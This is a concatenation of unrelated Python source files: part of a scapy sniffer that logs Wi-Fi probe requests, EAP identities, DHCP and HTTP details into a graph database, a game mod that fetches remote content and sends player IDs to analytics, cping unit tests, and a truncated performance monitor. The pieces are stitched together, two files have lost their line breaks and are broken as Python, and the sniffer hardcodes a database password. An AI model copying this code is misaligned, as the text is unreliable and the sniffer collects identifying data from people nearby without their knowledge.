        if eap.code == 1:  # EAP code=request
            if eap.type == 1:  # EAP type=identity
                connections.append(('EAP/IDENTITY/SENT_REQUEST', pkt.addr2, pkt.addr1))
            else:
                logger.debug('Unknown EAP type', eap.code, eap.type)
        elif eap.code == 2:  # EAP code=response
            if eap.type == 1:  # EAP type=identity
                connections.append(('EAP/IDENTITY/RESPONSE', pkt.addr2, eap.identity.decode()))
                connections.append(('EAP/IDENTITY/SENT_RESPONSE', pkt.addr2, pkt.addr1))
                connections.append(('EAP/IDENTITY/RECV_RESPONSE', eap.identity.decode(), pkt.addr1))
            else:
                logger.debug('Unknown EAP type', eap.code, eap.type)
        else:
            logger.debug('DEBUG: Unknown EAP code', eap.code)
    elif pkt.haslayer(IP):
        ip = pkt.getlayer(IP)
        connections.append(('ETHER/IP/TRANSMITS_IP', pkt.addr2, ip.src))
        connections.append(('ETHER/IP/RECEIVES_IP', pkt.addr1, ip.dst))
        port_type = 'ERROR'  # sentinel: stays 'ERROR' for non-UDP/TCP packets
        if pkt.haslayer(UDP):
            port_type = 'udp'
            if pkt.haslayer(DHCP):
                bootp = pkt.getlayer(BOOTP)
                dhcp = pkt.getlayer(DHCP)
                # Collect DHCP options as {name: values-tuple}, skipping padding.
                options = {}
                for option in dhcp.options:
                    if option in ['end', 'pad']:
                        continue
                    options[option[0]] = option[1:]
                options['message-type'] = options['message-type'][0]
                if options['message-type'] == 1:  # DISCOVER
                    # TODO: Use option 61 if available instead of pkt.addr2
                    if 'hostname' in options.keys():
                        connections.append(('DHCP/DISCOVER/HOSTNAME', pkt.addr2, options['hostname'][0].decode()))
                elif options['message-type'] == 2:  # OFFER
                    connections.append(('BOOTP/YIADDR', pkt.addr1, bootp.yiaddr))
                    if 'router' in options.keys():
                        for router in options['router']:
                            connections.append(('DHCP/OFFER/ROUTER', pkt.addr1, router))
                    if 'name_server' in options.keys():
                        for name_server in options['name_server']:
                            connections.append(('DHCP/OFFER/NAME_SERVER', pkt.addr1, name_server))
                    if 'domain' in options.keys():
                        for domain in options['domain']:
                            # Domain strings may carry trailing NUL padding.
                            connections.append(('DHCP/OFFER/DOMAIN', pkt.addr1, domain.decode().replace('\x00', '')))
                elif options['message-type'] == 5:  # ACK
                    connections.append(('BOOTP/YIADDR', pkt.addr2, bootp.yiaddr))
                    if 'router' in options.keys():
                        for router in options['router']:
                            connections.append(('DHCP/ACK/ROUTER', pkt.addr2, router))
                    if 'name_server' in options.keys():
                        for name_server in options['name_server']:
                            connections.append(('DHCP/ACK/NAME_SERVER', pkt.addr2, name_server))
                    if 'domain' in options.keys():
                        for domain in options['domain']:
                            connections.append(('DHCP/ACK/DOMAIN', pkt.addr2, domain.decode().replace('\x00', '')))
                else:
                    logger.debug('DHCP unknown message-type', options['message-type'])
        elif pkt.haslayer(TCP):
            port_type = 'tcp'
        if port_type != 'ERROR':
            # Build "ip:port/proto" names; IPv6 addresses get bracketed.
            src_port_name = (ip.src if ip.version == 4 else '[' + str(ip.src) + ']') + ':' + str(ip.sport) + '/' + port_type
            dst_port_name = (ip.dst if ip.version == 4 else '[' + str(ip.dst) + ']') + ':' + str(ip.dport) + '/' + port_type
            connections.append(('IP/PORT', ip.src, src_port_name))
            connections.append(('IP/PORT', ip.dst, dst_port_name))
            connections.append(('IP/PORT/TRAFFIC', src_port_name, dst_port_name))
        if pkt.haslayer(HTTP):
            http = pkt.getlayer(HTTP)
            if pkt.haslayer(HTTPResponse):
                http_response = http.getlayer(HTTPResponse)
                if 'Host' in http_response.fields:
                    connections.append(('HTTP/RESPONSE/HOST', ip.src, http_response.fields['Host'].decode()))
            elif pkt.haslayer(HTTPRequest):
                http_request = http.getlayer(HTTPRequest)
                if 'Host' in http_request.fields:
                    connections.append(('HTTP/REQUEST/HOST', ip.src, http_request.fields['Host'].decode()))
                if 'Path' in http_request.fields:
                    # Fall back to the destination IP when no Host header exists.
                    hostname = http_request.fields['Host'].decode() if 'Host' in http_request.fields else ip.dst
                    path = http_request.fields['Path'].decode()
                    full_path = 'http://' + hostname + path
                    connections.append(('HTTP/REQUEST/PATH_REQUESTED', ip.src, full_path))
                if 'User-Agent' in http_request.fields:
                    connections.append(('HTTP/REQUEST/USER_AGENT', ip.src, http_request.fields['User-Agent'].decode()))
    elif pkt.haslayer(ARP):
        arp = pkt.getlayer(ARP)
        if arp.op == arp.is_at:
            connections.append(('ARP/IS_AT', arp.hwsrc, arp.psrc))
        elif arp.op == arp.who_has:
            connections.append(('ARP/WHO_HAS', arp.hwsrc, arp.pdst))
    return connections


def PacketHandler(pkt):
    """Top-level per-frame dispatcher: classify 802.11 management frames
    directly, hand data frames (and non-802.11 frames) to do_dpi().
    Returns a list of connection triples, or None for undecodable frames.
    """
    connections = []
    if pkt.haslayer(Dot11):
        if pkt.type == 0:  # management frame
            if pkt.subtype == 4:  # probe request
                if not pktInfoDecodeable(pkt):
                    return
                connections.append(('WIFI/MGMT/PROBE_REQUEST', pkt.addr2, pkt.info.decode()))
            elif pkt.subtype == 5:  # probe response
                if not pktInfoDecodeable(pkt):
                    return
                connections.append(('WIFI/MGMT/PROBE_RESPONSE/MAC_RECV_SSID', pkt.info.decode(), pkt.addr1))
                connections.append(('WIFI/MGMT/PROBE_RESPONSE/MAC_SENT_SSID', pkt.addr3, pkt.info.decode()))
                connections.append(('ETHER/GEN/MAC_TO_MAC', pkt.addr3, pkt.addr1))
            elif pkt.subtype == 8:  # beacon
                if not pktInfoDecodeable(pkt):
                    return
                connections.append(('WIFI/MGMT/BEACON', pkt.addr2, pkt.info.decode()))
        elif pkt.type == 2:  # data frame
            # TODO: Find out who sends what to whom, add ETHER/GEN/MAC_TO_MAC
            if pkt.FCfield & 0x40 == 0:  # skip protected (encrypted) frames
                connections += do_dpi(pkt)
    else:
        connections += do_dpi(pkt)
    return connections


def sniffer(sniffer_queue, db_queue):
    """Worker-process loop: take capture jobs ('*' = any interface, a file
    path = pcap replay, otherwise an interface name) from sniffer_queue,
    sniff them, and push ('new_rel', rel) / ('update_rel', ...) jobs plus a
    final None sentinel onto db_queue.
    """
    nice(1)  # Be a little nicer than the DB-thread
    prev_rels = []  # relations already announced to the DB worker
    rel_meta = {}   # per-relation counters and first/last-seen timestamps

    def purge_rel_meta():
        # Flush accumulated metadata to the DB worker and reset the caches.
        nonlocal prev_rels, rel_meta
        for rel in prev_rels:
            db_queue.put(('update_rel', (rel, rel_meta[rel])))
        rel_meta = {}
        prev_rels = []

    while True:
        job = sniffer_queue.get()
        if job is None:  # shutdown sentinel
            break
        frame_count = 0

        def _sniffer(rels, pkt):
            # Per-packet callback: record new relations, update metadata,
            # and purge to the DB every 100k frames.
            nonlocal frame_count, prev_rels, rel_meta
            frame_count += 1
            if rels is not None:
                for rel in rels:
                    if rel is None:
                        continue
                    # NOTE(review): list membership here is O(n) per packet.
                    if rel not in prev_rels:
                        db_queue.put(('new_rel', rel))
                        prev_rels.append(rel)
                        rel_meta[rel] = {
                            'times': 1,
                            'first_seen': pkt.time,
                            'last_seen': pkt.time
                        }
                    else:
                        rel_meta[rel]['times'] += 1
                        if pkt.time < rel_meta[rel]['first_seen']:
                            rel_meta[rel]['first_seen'] = pkt.time
                        elif pkt.time > rel_meta[rel]['last_seen']:
                            rel_meta[rel]['last_seen'] = pkt.time
            if (frame_count % 100000) == 0:
                purge_rel_meta()

        start_time = time.time()
        if job == '*':
            sniff(store=0, prn=lambda p: _sniffer(PacketHandler(p), p))
        elif os.path.isfile(job):
            sniff(offline=job, store=0, prn=lambda p: _sniffer(PacketHandler(p), p))
        else:
            sniff(iface=job, store=0, prn=lambda p: _sniffer(PacketHandler(p), p))
        end_time = time.time()
        sniffer_queue.task_done()
        purge_rel_meta()
    # Tell the DB worker this sniffer is done (it counts these sentinels).
    db_queue.put(None)


def db_worker(top_count, db_queue):
    """DB-process loop: consume jobs from db_queue until `top_count` None
    sentinels (one per sniffer process) have arrived. 'new_rel' jobs are
    deduplicated against a sliding window of the last 100k relations and
    merged into the graph; 'update_rel' jobs are currently ignored.
    """
    existing_rels = []
    while True:
        try:
            job = db_queue.get()
            if job is None:
                top_count -= 1
                if top_count == 0:
                    break
            else:
                job_type, job_value = job
                if job_type == 'new_rel':
                    if job_value in existing_rels:
                        # NOTE(review): `continue` skips db_queue.task_done()
                        # for duplicates — TODO confirm intended.
                        continue
                    existing_rels.append(job_value)
                    existing_rels = existing_rels[-100000:]  # bound memory
                    register_connection(get_connection(*job_value))
                elif job_type == 'update_rel':
                    pass
                else:
                    raise Exception('Unknown job_type', job_type)
            db_queue.task_done()
        except:
            # NOTE(review): bare except silently drops DB errors — TODO log.
            pass


logger = logging.getLogger()
print('Connecting to graph')
graph = Graph(password='password')  # TODO: parameterize, don't hardcode password


def main():
    """Spawn one sniffer process per CLI argument (pcap file or interface
    name; no args = sniff everything) plus a single DB worker, then wait
    for all of them to finish.
    """
    sniffer_count = min([cpu_count(), len(argv[1:])])
    sniffer_queue = JoinableQueue()
    db_queue = JoinableQueue()
    for filename in argv[1:]:
        if os.path.isfile(filename):
            print('Will be loading from file', filename)
        else:
            print('Will sniff from interface', filename)
        sniffer_queue.put(filename)
    if argv[1:] == []:
        # No arguments: sniff all interfaces with a single worker.
        sniffer_queue.put('*')
        if sniffer_count == 0:
            sniffer_count = 1
    sniffers = []
    for _ in range(sniffer_count):
        p = Process(target=sniffer, args=(sniffer_queue, db_queue))
        p.start()
        sniffers.append(p)
        # One shutdown sentinel per sniffer process.
        # NOTE(review): sentinel-per-iteration placement inferred — confirm.
        sniffer_queue.put(None)
    db_proc = Process(target=db_worker, args=(sniffer_count, db_queue))
    db_proc.start()
    interfaces = []  # NOTE(review): unused
    sniffer_queue.close()
    db_proc.join()
    for _ in sniffers:
        _.join()


if __name__=='__main__':
    main()
mod_modPackInformer.py
# -*- coding: utf-8 -*- import json import os import threading import urllib import urllib2 import BigWorld import ResMgr from gui.Scaleform.daapi.view.dialogs import DIALOG_BUTTON_ID, ConfirmDialogButtons, SimpleDialogMeta from gui.Scaleform.daapi.view.lobby.LobbyView import LobbyView from gui import DialogsInterface, SystemMessages, makeHtmlString from notification.NotificationListView import NotificationListView from constants import AUTH_REALM from helpers import getLanguageCode from adisp import process from gui.Scaleform.daapi.view.common.BaseTicker import BaseTicker from helpers import dependency from skeletons.gui.game_control import IBrowserController, IExternalLinksController class Config(object): def __init__(self): self.data = { 'version' : '', 'name' : '', 'serverMain' : '', 'serverBackup' : '', 'statistic' : False, 'statisticTid' : '', 'openLinkInGameBrowser': False } xml = ResMgr.openSection('scripts/client/gui/mods/mod_modPackInformer.xml') if xml is not None: self.data['version'] = '%s' % xml.readString('version', '') self.data['name'] = '%s' % xml.readString('name', '') self.data['serverMain'] = '%s' % xml.readString('serverMain', '') self.data['serverBackup'] = '%s' % xml.readString('serverBackup', '') self.data['statistic'] = xml.readBool('statistic', False) self.data['statisticTid'] = '%s' % xml.readString('statisticTid', '') self.data['openLinkInGameBrowser'] = xml.readBool('openLinkInGameBrowser', False) class Updater(object): def __init__(self): self.show = True self.count = 0 self.lin1 = '' def start(self): if not updater.show: return try: f = urllib2.urlopen(config.data['serverMain']) except StandardError: f = None if f is None or f.getcode() is not 200: try: f = urllib2.urlopen(config.data['serverBackup']) except StandardError: f = None if f is not None and f.getcode() is 200: mod_text = '' json_text = json.loads(f.read().decode('utf-8-sig')) if config.data['version'] != '%s' % json_text['version']: self.show = False if 
json_text['header']: mod_text += '%s' % json_text['header'].format(**json_text) if json_text['image']: try: image = 'img://gui/html/%s' % json_text['imageName'] path = os.path.realpath(os.path.join('./res/gui/html', '%s' % json_text['imageName'])) if not os.path.exists(path): urllib.urlretrieve('%s' % json_text['imageLink'], path) except StandardError: image = '' path = '' if image and path and os.path.exists(path): mod_text += '<br/><img src=\"%s\" width=\"%s\" height=\"%s\">' % (image, json_text['imageWidth'], json_text['imageHeight']) if json_text['message']: mod_text += '<br/>%s' % json_text['message'].format(**json_text) self.lin1 = '%s' % json_text['link'] DialogsInterface.showDialog(SimpleDialogMeta(json_text['windowName'], mod_text, ConfirmDialogButtons(json_text['buttonNameOpen'], json_text['buttonNameClose']), None), self.click) link = makeHtmlString('html_templates:lobby/system_messages', 'link', { 'text' : '%s' % json_text['messageLinkName'], 'linkType': '%s' % self.lin1 }) p__msg = '%s<br><br>' % json_text['header'].format(**json_text) p__msg += '<font color="#E2D2A2" size="15"><b>%s</b></font>' % link SystemMessages.pushMessage(p__msg, SystemMessages.SM_TYPE.GameGreeting) def click(self, isConfirmed): if isConfirmed and self.lin1: if self.lin1.lower().startswith('http:') or self.lin1.lower().startswith('https:'): if config.data['openLinkInGameBrowser']: browser.open(self.lin1) else: BigWorld.wg_openWebBrowser(self.lin1) def openLink(self, action): if self.lin1 in action: self.click(True) return True return class Statistics(object): def __init__(self): self.analytics_started = False self.thread_analytics = None self.user = None self.old_user = None def analytics_start(self): if not self.analytics_started: lang = str(getLanguageCode()).upper() param = urllib.urlencode({ 'v' : 1, # Version. 'tid': config.data['statisticTid'], 'cid': self.user, # Anonymous Client ID. 't' : 'screenview', # Screenview hit type. 
'an' : 'modPackInformer "%s"' % config.data['name'], # App name. 'av' : 'modPackInformer "%s" %s' % (config.data['name'], config.data['version']), 'cd' : 'Cluster: [%s], lang: [%s]' % (AUTH_REALM, lang), # Screen name / content description. 'ul' : '%s' % lang, 'sc' : 'start' }) urllib2.urlopen(url='http://www.google-analytics.com/collect?', data=param).read() self.analytics_started = True self.old_user = BigWorld.player().databaseID def start(self): player = BigWorld.player() if self.user and self.user != player.databaseID: self.old_user = player.databaseID self.thread_analytics = threading.Thread(target=self.end, name='Thread') self.thread_analytics.start() self.user = player.databaseID self.thread_analytics = threading.Thread(target=self.analytics_start, name='Thread') self.thread_analytics.start() def end(self): if self.analytics_started: lang = str(getLanguageCode()).upper() param = urllib.urlencode({ 'v' : 1, # Version. 'tid': config.data['statisticTid'], 'cid': self.user, # Anonymous Client ID. 't' : 'screenview', # Screenview hit type. 'an' : 'modPackInformer "%s"' % config.data['name'], # App name. 'av' : 'modPackInformer "%s" %s' % (config.data['name'], config.data['version']), 'cd' : 'Cluster: [%s], lang: [%s]' % (AUTH_REALM, lang), # Screen name / content description. 
'ul' : '%s' % lang, 'sc' : 'end' }) urllib2.urlopen(url='http://www.google-analytics.com/collect?', data=param).read() self.analytics_started = False class p__Browser(BaseTicker): externalBrowser = dependency.descriptor(IExternalLinksController) internalBrowser = dependency.descriptor(IBrowserController) def __init__(self): super(p__Browser, self).__init__() self.__browserID = 'modPackInformer' return def _dispose(self): self.__browserID = 'modPackInformer' super(p__Browser, self)._dispose() return def open(self, link, internal=True): if internal: if self.internalBrowser is not None: self.__showInternalBrowser(link) else: self.__showExternalBrowser(link) else: self.__showExternalBrowser(link) return @process def __showInternalBrowser(self, link): self.__browserID = yield self.internalBrowser.load(url=link, browserID=self.__browserID) def __showExternalBrowser(self, link): if self.externalBrowser is not None: self.externalBrowser.open(link) def hookedGetLabels(self): return [{ 'id' : DIALOG_BUTTON_ID.SUBMIT, 'label' : self._submit, 'focused': True }, { 'id' : DIALOG_BUTTON_ID.CLOSE, 'label' : self._close, 'focused': False }] def hookedLobbyPopulate(self): hookLobbyPopulate(self) start = threading.Thread(target=updater.start, name='updater.start') start.start() if config.data['statistic']: stat.start() def hookedOnClickAction(*args): if updater.openLink(args[3]): return hookOnClickAction(*args) def init(): print '[LOAD_MOD]: [modPackInformer, by spoter]' def fini(): stat.end() config = Config() browser = p__Browser() updater = Updater() stat = Statistics() ConfirmDialogButtons.getLabels = hookedGetLabels hookLobbyPopulate = LobbyView._populate LobbyView._populate = hookedLobbyPopulate hookOnClickAction = NotificationListView.onClickAction NotificationListView.onClickAction = hookedOnClickAction
test_legacy.py
'''cping.layouts.legacy tests'''
import contextlib
import io
import re
import threading
import unittest

import cping.layouts.legacy
import cping.protocols


class TestLayout(unittest.TestCase):
    '''cping.layouts.legacy.Layout tests.'''
    def test___call__(self):
        '''Calling the layout enters the alternate screen buffer and leaves
        it again automatically once no hosts are running.'''
        stop_event = threading.Event()
        layout = cping.layouts.legacy.Layout(cping.protocols.Ping(0.5))
        layout.protocol.ping_loop = lambda _: stop_event.wait()
        for name in ('host1', 'host2'):
            layout.add_host(name).start()
        captured = io.StringIO()
        with contextlib.redirect_stdout(captured):
            worker = threading.Thread(target=layout)
            worker.start()
            stop_event.set()
            worker.join()
        screen = captured.getvalue()
        # Alternate buffer entered and cursor homed to 1;1
        self.assertTrue(screen.startswith('\x1b[?1049h\x1b[H'))
        # Alternate buffer exited on shutdown
        self.assertIn('\x1b[?1049l', screen)


class TestFormatHost(unittest.TestCase):
    '''cping.layouts.legacy.format_host tests.'''
    def test_host_status(self):
        '''A host status, when present, appears in the formatted line.'''
        host = cping.protocols.Ping()('localhost')
        host.status = 'Test status'
        rendered = cping.layouts.legacy.format_host(host, 4, 80)
        self.assertIn(host.status, rendered)

    def test_line_width(self):
        '''A wider line grows the host's results buffer.'''
        # pylint: disable=no-member
        # Linter bug
        host = cping.protocols.Ping()('localhost')
        previous_length = host.raw_results.maxlen
        cping.layouts.legacy.format_host(host, 4, 150)
        self.assertGreater(host.raw_results.maxlen, previous_length)

    def test_statistics(self):
        '''The formatted line carries the host's statistics.'''
        host = cping.protocols.Ping()('localhost')
        for sample in (-1, -1, 1, 2):
            host.add_result(sample)
        rendered = cping.layouts.legacy.format_host(host, 4, 80)
        for expected in (' 1000.00', ' 1500.00', ' 2000.00', ' 707', ' 50%'):
            self.assertIn(expected, rendered)


class TestGetHistogram(unittest.TestCase):
    '''cping.layouts.legacy.get_histogram tests.'''
    def test_results(self):
        '''Results map onto the expected histogram glyphs.'''
        host = cping.protocols.Ping()('localhost')
        for sample in (-1, 0, -1, -1, 0):
            host.add_result(sample)
        rendered = cping.layouts.legacy.get_histogram(host, 80)
        self.assertIn('.!..!', strip_colors(rendered))


class TestGetColor(unittest.TestCase):
    '''cping.layouts.legacy.get_color tests.'''
    def test_color(self):
        '''A known color name yields its ANSI escape code.'''
        self.assertEqual(cping.layouts.legacy.get_color('red'), '\x1b[31m')

    def test_last_color(self):
        '''Requesting the color already in effect yields an empty string.'''
        self.assertEqual(cping.layouts.legacy.get_color('red', 'red'), '')

    def test_non_existent_color(self):
        '''An unknown color name yields an empty string.'''
        self.assertEqual(cping.layouts.legacy.get_color('hi'), '')


class TestGetTable(unittest.TestCase):
    '''cping.layouts.legacy.get_table tests.'''
    def test_overflow(self):
        '''Excess hosts collapse into a "more" marker unless all_hosts is
        set.'''
        hosts = [cping.protocols.Ping()(str(index)) for index in range(60)]
        self.assertIn(' more', cping.layouts.legacy.get_table(hosts))
        self.assertNotIn(
            ' more', cping.layouts.legacy.get_table(hosts, all_hosts=True))


def strip_colors(data):
    '''Return `data` with all ANSI foreground color codes removed.'''
    return re.sub(r'\x1b\[\d*m', '', data)
performance_monitor1.py
#!/usr/bin/env python # -*- coding:utf-8 -*- # Author: leeyoshinari import os import re import time import json import copy import queue import traceback import threading from concurrent.futures import ThreadPoolExecutor import requests import influxdb from common import handle_exception, get_ip from logger import logger, cfg class PerMon(object): def __init__(self): self.check_sysstat_version() self.IP = get_ip() self.thread_pool = cfg.getAgent('threadPool') if cfg.getAgent('threadPool') >= 0 else 0 self._msg = {'port': [], 'pid': [], 'isRun': [], 'startTime': []} # port、pid、status、startTime self.is_system = cfg.getMonitor('isMonSystem') # Whether to monitor the server system self.error_times = cfg.getMonitor('errorTimes') self.sleepTime = cfg.getMonitor('sleepTime') self.maxCPU = cfg.getMonitor('maxCPU') self.CPUDuration = cfg.getMonitor('CPUDuration') self.isCPUAlert = cfg.getMonitor('isCPUAlert') self.minMem = cfg.getMonitor('minMem') self.isMemAlert = cfg.getMonitor('isMemAlert') self.isPidAlert = cfg.getMonitor('isPidAlert') self.errorTimesOfPid = cfg.getMonitor('errorTimesOfPid') self.frequencyFGC = cfg.getMonitor('frequencyFGC') self.isJvmAlert = cfg.getMonitor('isJvmAlert') self.echo = cfg.getMonitor('echo') self.isDiskAlert = cfg.getMonitor('isDiskAlert') self.maxDiskUsage = cfg.getMonitor('maxDiskUsage') / 100 self.isTCP = cfg.getMonitor('isTCP') self.timeSetting = cfg.getMonitor('timeSetting') system_interval = cfg.getMonitor('systemInterval') port_interval = cfg.getMonitor('portInterval') self.system_interval = max(system_interval, 1) # If the set value is less than 1, the default is 1 self.port_interval = max(port_interval, 1) # If the set value is less than 1, the default is 1 self.system_interval = self.system_interval - 1.1 # Program running time self.system_interval = max(self.system_interval, 0) self.port_interval = self.port_interval - 1.03 # Program running time self.port_interval = max(self.port_interval, 0) self.system_version = '' # system 
version self.cpu_info = '' self.cpu_usage = 0.0 # CPU usage self.cpu_cores = 0 # number of CPU core self.mem_usage = 0.0 # memory usage self.total_mem = 0 # totel memory, unit: G self.total_mem_100 = 0 # total memory, unit: 100*G self.nic = '' # network card self.all_disk = [] # disk number self.total_disk = 1 # total disk size, unit: M self.total_disk_h = 0 # total disk size, unit:T or G self.network_speed = cfg.getAgent('nicSpeed') # bandwidth self.Retrans_num = self.get_RetransSegs() # TCP retrans number self.get_system_version() self.get_cpu_cores() self.get_total_mem() self.get_system_nic() self.get_disks() self.get_system_net_speed() self.get_total_disk_size() self.monitor_task = queue.Queue() # FIFO queue # thread pool, +2 is the need for monitoring system and registration service self.executor = ThreadPoolExecutor(self.thread_pool + 2) self.client = influxdb.InfluxDBClient(cfg.getInflux('host'), cfg.getInflux('port'), cfg.getInflux('username'), cfg.getInflux('password'), cfg.getInflux('database')) # influxdb connection self.FGC = {} # full gc times self.FGC_time = {} # full gc time self.last_cpu_io = [] # recently cpu usage self.is_java = {} # whether is java, 0 or 1 self.monitor() @property def start(self): return self._msg @start.setter def start(self, value): if value['port']: self.is_java_server(value['port']) # Determine whether the port is java service if value['port'] in self._msg['port']: # If the port has been monitored, update it index = self._msg['port'].index(value['port']) self._msg['pid'][index] = value['pid'] # If the monitoring has been stopped, update the monitoring status and start monitoring time if self._msg['isRun'][index] == 0: self._msg['isRun'][index] = value['is_run'] self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S') self.monitor_task.put((self.write_cpu_mem, index)) # Put the monitoring task into the queue self.FGC[str(value['port'])] = 0 # reset FGC times self.FGC_time[str(value['port'])] = [] # reset FGC time if 
self.monitor_task.qsize() > 0: # If the queue is not empty, the monitoring status is set to 2 self._msg['isRun'][index] = 2 # queueing else: self._msg['isRun'][index] = value['is_run'] self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S') else: self._msg['pid'].append(value['pid']) # If the port has not been monitored, add it self._msg['port'].append(value['port']) self._msg['isRun'].append(value['is_run']) self._msg['startTime'].append(time.strftime('%Y-%m-%d %H:%M:%S')) self.monitor_task.put((self.write_cpu_mem, len(self._msg['port'])-1)) # Put the monitoring task into the queue self.FGC.update({str(value['port']): 0}) # initialize FGC times self.FGC_time.update({str(value['port']): []}) # initialize FGC time if self.monitor_task.qsize() > 0: # If the queue is not empty, the monitoring status is set to 2 self._msg['isRun'][-1] = 2 # queueing else: raise Exception('Parameter Exception') @property def stop(self): return self._msg @stop.setter def stop(self, value): index = self._msg['port'].index(value['port']) self._msg['isRun'][index] = value['is_run'] def worker(self): """ Get data from the queue and start monitoring :return: """ while True: func, param = self.monitor_task.get() func(param) self.monitor_task.task_done() def monitor(self): """ start monitoring :return: """ for i in range(self.thread_pool + 2): self.executor.submit(self.worker) # Put registration and cleanup tasks in the queue self.monitor_task.put((self.register_agent, True)) # Put the tasks of the monitoring system into the queue self.monitor_task.put((self.write_system_cpu_mem, 1)) def write_cpu_mem(self, index): """ Monitoring port. 
CPU, Memory, jvm(Java), disk read and write :param index: Subscript index of the port :return: """ self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S') # Update start monitoring time jvm = 0.0 # Initialize jvm, used for non-java services run_error_times = 0 # Initialize the times that the continuous failure to execute monitoring commands port = self._msg['port'][index] pid = self._msg['pid'][index] is_run_jvm = self.is_java.get(str(port), 0) line = [{'measurement': self.IP, 'tags': {'type': str(port)}, 'fields': { 'c_time': '', 'cpu': 0.0, 'wait_cpu': 0.0, 'mem': 0.0, 'jvm': 0.0, 'rKbs': 0.0, 'wKbs': 0.0, 'iodelay': 0.0, 'tcp': 0, 'close_wait': 0, 'time_wait': 0 }}] while True: if self._msg['isRun'][index] > 0: # Start monitoring self._msg['isRun'][index] = 1 # Reset the status to monitoring try: pid_info = self.get_pid_cpu_mem_io(pid) # get CPU, disk read and write if not pid_info: # If the CPU usage rate is None, the monitoring command is executed wrong. logger.warning(f'The CPU is NOne, the abnormal pid is {pid}') pid = port_to_pid(port) # Query pid based on port if pid: # If the pid exists, update it self._msg['pid'][index] = pid self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S') else: run_error_times += 1 # If continuous execution commands fails, stop monitoring if run_error_times > self.error_times: self._msg['isRun'][index] = 0 logger.error(f'The port {port} fails to execute commands continuously within ' f'{self.error_times * self.sleepTime}s, and the monitoring has stopped.') time.sleep(1) break if self.isPidAlert: if run_error_times > self.errorTimesOfPid: msg = f'The port {port} of the {self.IP} failed to execute commands continuously within ' \ f'{self.errorTimesOfPid * self.sleepTime}s, and the monitoring had been stopped.' 
logger.warning(msg) self._msg['isRun'][index] = 0 thread = threading.Thread(target=notification, args=(msg,)) # Start thread to send email thread.start() time.sleep(1) break time.sleep(self.sleepTime) continue line[0]['fields']['c_time'] = time.strftime("%Y-%m-%d %H:%M:%S") line[0]['fields']['cpu'] = pid_info['cpu'] line[0]['fields']['wait_cpu'] = pid_info['wait_cpu'] line[0]['fields']['mem'] = pid_info['mem'] line[0]['fields']['rKbs'] = pid_info['kB_rd'] line[0]['fields']['wKbs'] = pid_info['kB_wr'] line[0]['fields']['iodelay'] = pid_info['iodelay'] tcp_num = self.get_port_tcp(port) line[0]['fields']['tcp'] = tcp_num.get('tcp', 0) line[0]['fields']['close_wait'] = tcp_num.get('close_wait', 0) line[0]['fields']['time_wait'] = tcp_num.get('time_wait', 0) if is_run_jvm: jvm = self.get_jvm(port, pid) # get JVM size line[0]['fields']['jvm'] = jvm self.client.write_points(line) # write database logger.info(f'cpu_and_mem: port_{port},pid_{pid},{pid_info},{jvm}') run_error_times = 0 # If the monitoring command is executed successfully, reset it except(Exception): logger.error(traceback.format_exc()) time.sleep(self.sleepTime) time.sleep(self.port_interval) if self._msg['isRun'][index] == 0: # If status=0, stop monitoring logger.info(f'Port {port} has been stopped monitoring.') self.FGC[str(port)] = 0 self._msg['isRun'][index] = 0 break def write_system_cpu_mem(self, is_system): """ Monitoring system. CPU, Memory, Disk IO, Network, TCP :param is_system: :return: """ cpu_flag = True # Flag of whether to send mail when the CPU usage is too high mem_flag = True # Flag of whether to send mail when the free memory is too low echo = True # Flag of whether to clean up cache line = [{'measurement': self.IP, 'tags': {'type': 'system'}, 'fields': { 'c_time': '', 'cpu': 0.0, 'iowait': 0.0, 'usr_cpu': 0.0, 'mem': 0.0, 'mem_available': 0.0, 'rec': 0.0, 'trans': 0.0, 'net': 0.0, 'tcp': 0, 'retrans': 0 }}] for disk in self.all_disk: # The system disks exists in the format of 'sda-1'. 
Since influxdb cannot recognize the '-', need to replace it. # Other formats need to be verified disk_n = disk.replace('-', '') line[0]['fields'].update({disk_n: 0.0}) line[0]['fields'].update({disk_n + '_r': 0.0}) line[0]['fields'].update({disk_n + '_w': 0.0}) line[0]['fields'].update({disk_n + '_d': 0.0}) while True: if self.is_system: try: res = self.get_system_cpu_io_speed() # get CPU, memory, IO, network, TCP if res['disk'] and res['cpu'] is not None and res['mem'] is not None: for k, v in res['disk'].items(): line[0]['fields'][k] = min(v, 100.0) for k, v in res['disk_r'].items(): line[0]['fields'][k] = v for k, v in res['disk_w'].items(): line[0]['fields'][k] = v for k, v in res['disk_d'].items(): line[0]['fields'][k] = v line[0]['fields']['c_time'] = time.strftime("%Y-%m-%d %H:%M:%S") line[0]['fields']['cpu'] = res['cpu'] line[0]['fields']['iowait'] = res['iowait'] line[0]['fields']['usr_cpu'] = res['usr_cpu'] line[0]['fields']['mem'] = res['mem'] line[0]['fields']['mem_available'] = res['mem_available'] line[0]['fields']['rec'] = res['rece'] line[0]['fields']['trans'] = res['trans'] line[0]['fields']['net'] = res['network'] line[0]['fields']['tcp'] = res['tcp'] line[0]['fields']['retrans'] = res['retrans'] self.client.write_points(line) # write to database logger.info(f"system: CpuAndMem,{res['cpu']},{res['mem']},{res['disk']},{res['disk_r']}," f"{res['disk_w']},{res['rece']},{res['trans']},{res['network']}, " f"{res['tcp']}, {res['retrans']}") if len(self.last_cpu_io) > self.CPUDuration: self.last_cpu_io.pop(0) self.last_cpu_io.append(res['cpu']) self.cpu_usage = sum(self.last_cpu_io) / len(self.last_cpu_io) # CPU usage, with % self.mem_usage = 1 - res['mem'] / self.total_mem # Memory usage, without % if self.cpu_usage > self.maxCPU: msg = f'{self.IP} server CPU average usage is {self.cpu_usage}%, it is too high.' 
